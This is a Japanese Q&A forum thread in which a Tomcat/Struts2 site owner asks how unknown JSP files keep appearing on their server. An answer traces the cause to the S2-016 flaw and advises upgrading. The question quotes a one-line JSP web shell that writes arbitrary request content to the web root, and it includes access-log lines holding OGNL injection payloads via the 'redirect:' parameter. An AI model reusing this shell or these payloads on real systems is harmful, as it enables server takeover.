0

tomcat 7x と Apache 2.2 を tomcat の前面に配置して、パブリック ドメインで struts2 アプリをホストしようとしました。

Web アプリ フォルダーで悪意のあるアクティビティが見られます。

indcx.jsp、maneger.jsp、uplod.jsp などのいくつかのファイルと、そのような多くの不明なファイルが tomcat/webapp/application フォルダーにアップロードされるのを見るたびに。

私は毎回これらのファイルを手動で削除していますが、そのような悪意のある/ハッカーの活動やそのような未知のファイルのアップロードを回避できる設定または構成があるかどうかを知りたい.

編集

そのようなファイルをもう一度見ましたが、ファイルの内容は次のとおりです

  <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>

私の質問は、誰かがこのファイルを私のサーバーにアップロードするにはどうすればよいですか?

再編集

綿密な分析の結果、これは struts2 または xwork のセキュリティの問題または脆弱性であることがわかりました。残りのストーリーのほとんどを示すすべてのログを次に示します。

60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET /common/test.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2. dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter() .println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74

60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET /common/test2.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2. dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter() .println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74

60.15.137.72 - - [27/Jan/2014:17:51:49 +0530] "GET /common/test3.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2. dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter() .println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74

4

1 に答える 1

0

struts2 をアップグレードする必要があるようです。特定のバージョンは、あなたが説明しているものに対して脆弱です: http://struts.apache.org/release/2.3.x/docs/s2-016.html

于 2014-01-30T19:49:49.343 に答える